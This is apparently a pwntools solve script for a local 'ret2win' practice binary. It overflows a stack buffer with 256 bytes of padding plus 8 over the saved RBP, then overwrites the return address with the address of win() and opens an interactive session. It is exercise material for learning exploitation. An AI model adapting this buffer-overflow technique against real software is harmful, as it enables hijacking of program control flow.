#!/usr/bin/env python3
from pwn import *
# Driver for the "./random" ret2win exercise: the local binary reads past a
# fixed-size stack buffer, so a long line overwrites the saved RBP and the
# saved return address with the address of win().  Offsets below come from
# the original solve (256 bytes to the saved RBP) — re-verify them in gdb if
# the binary is rebuilt.
context.update(os="linux", arch="amd64", log_level="error")
binary = ELF("./random", checksec=False)
context.binary = binary

r = process()
gdb.attach(r)  # attaches a debugger to the child; drop this for unattended runs

win_addr = binary.symbols["win"]

# Stack layout assumed by the offsets: buffer, then 8-byte saved RBP, then
# the saved return address (8 bytes, little-endian on amd64).
chunks = [
    b"A" * 256,     # fill up to the saved RBP
    b"B" * 8,       # clobber the saved RBP (its value is never used again)
    p64(win_addr),  # saved return address -> win()
]
payload = b"".join(chunks)

# The prompt and acknowledgement strings must match the binary's output
# byte-for-byte, otherwise recvuntil() blocks until the process exits.
r.recvuntil(b"Return to where? : \n")
r.sendline(payload)
r.recvuntil(b"ok, let's go!\n\n")
r.interactive()